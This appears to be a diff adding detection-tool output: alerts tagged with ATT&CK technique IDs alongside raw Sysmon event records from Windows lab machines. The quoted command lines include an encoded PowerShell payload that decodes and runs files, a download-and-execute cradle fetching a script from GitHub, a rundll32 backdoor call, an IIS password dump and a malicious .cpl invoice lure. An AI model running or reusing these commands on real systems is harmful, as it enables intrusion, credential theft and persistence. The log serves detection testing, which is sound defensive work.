+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6188
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:54.428
+ 365ABB72-FE76-5CEB-0000-0010546E0C00
+ 2356
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 417079
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-17 11:43:36.303
+ 747F3D96-D8E8-5F8A-0000-00102CEF7200
+ 840
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ "C:\Windows\System32\rundll32.exe"
+ C:\Users\IEUser\AppData\Roaming\
+ MSEDGEWIN10\IEUser
+ 747F3D96-CA8D-5F8A-0000-0020D1090A00
+ 0xa09d1
+ 1
+ High
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-D8E5-5F8A-0000-0010E1BC7200
+ 2920
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe
+ C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 10674
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-14 12:17:14.447
+ 747F3D96-FBCA-5D53-0000-0010B8664100
+ 2476
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\rundll32.exe" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-F419-5D53-0000-002026910200
+ 0x29126
+ 1
+ Medium
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-F41E-5D53-0000-001067C80300
+ 4824
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1557680510.781015,2019-05-12T21:01:50.781015+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 16496
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-12 17:01:31.380
+ 365ABB72-516B-5CD8-0000-001087E41600
+ 3788
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Users\IEUser\
+ IEWIN7\IEUser
+ 365ABB72-4FB5-5CD8-0000-0020F2350100
+ 0x135f2
+ 1
+ Medium
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-502E-5CD8-0000-00102A330700
+ 3192
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969974.544664,2019-05-27T19:12:54.544664+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6188
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:54.428
+ 365ABB72-FE76-5CEB-0000-0010546E0C00
+ 2356
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-FD85-5CEB-0000-00104C0E0B00
+ 1944
+ C:\Windows\System32\notepad.exe
+ "C:\Windows\System32\notepad.exe"
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1223] Compiled HTML File,1564126754.409237,2019-07-26T11:39:14.409237+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\hh.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4348
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-26 07:39:14.345
+ 747F3D96-AE22-5D3A-0000-001096B24E00
+ 1504
+ C:\Windows\hh.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft® HTML Help Executable
+ HTML Help
+ Microsoft Corporation
+ "C:\Windows\hh.exe" C:\Users\IEUser\Desktop\Fax Record N104F.chm
+ C:\Users\IEUser\Desktop\
+ MSEDGEWIN10\IEUser
+ 747F3D96-ABD5-5D3A-0000-0020EB990F00
+ 0xf99eb
+ 1
+ Medium
+ SHA1=4B1E2F8EFBECB677080DBB26876311D9E06C5020,MD5=1CECEE8D02A8E9B19D3A1A65C7A2B249,SHA256=8AB2F9A4CA87575F03F554AEED6C5E0D7692FA9B5D420008A1521F7F7BD2D0A5,IMPHASH=D3D9C3E81A404E7F5C5302429636F04C
+ 747F3D96-ABD7-5D3A-0000-001012661000
+ 4940
+ C:\Windows\explorer.exe
+ C:\Windows\Explorer.EXE
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243534
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.993
+ 747F3D96-9F68-5E75-0000-0010B9662000
+ 7420
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243534
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.993
+ 747F3D96-9F68-5E75-0000-0010B9662000
+ 7420
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766825.20521,2020-03-21T09:00:25.205210+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243534
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:24.993
+ 747F3D96-9F68-5E75-0000-0010B9662000
+ 7420
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920559.143393,2019-05-27T05:29:19.143393+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5949
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:19.103
+ 365ABB72-3D6F-5CEB-0000-001066B5FF00
+ 2796
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1564434679.865791,2019-07-30T01:11:19.865791+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt) and Parent Image :C:\Windows\SysWOW64\rundll32.exe , Parent CommandLine ("C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",) in directory : ( C:\Users\IEUser\AppData\Local\Temp\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4865
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:11:19.010
+ 747F3D96-60F7-5D3F-0000-00106F2F5600
+ 6160
+ C:\Windows\SysWOW64\wscript.exe
+ 5.812.10240.16384
+ Microsoft ® Windows Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ "C:\Windows\System32\wscript.exe" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt
+ C:\Users\IEUser\AppData\Local\Temp\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-0020B5314100
+ 0x4131b5
+ 1
+ Medium
+ SHA1=5D7F2AFD2FF69D379B69DD94033B51EC537E8E52,MD5=F2748908C6B873CB1970DF4C07223E72,SHA256=0FBB4F848D9FB14D7BF81B0454203810869C527C3435E8747A2213DD86F8129A,IMPHASH=3602F3C025378F418F804C5D183603FE
+ 747F3D96-60F5-5D3F-0000-0010A8D75500
+ 4884
+ C:\Windows\SysWOW64\rundll32.exe
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\IEUser\Downloads\Invoice@0582.cpl",
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1074] Data Staged - Process,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4910
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:23.170
+ 747F3D96-6623-5D3F-0000-001011F68700
+ 5816
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-6609-5D3F-0000-00109FBF8500
+ 1208
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564436003.232566,2019-07-30T01:33:23.232566+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4910
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
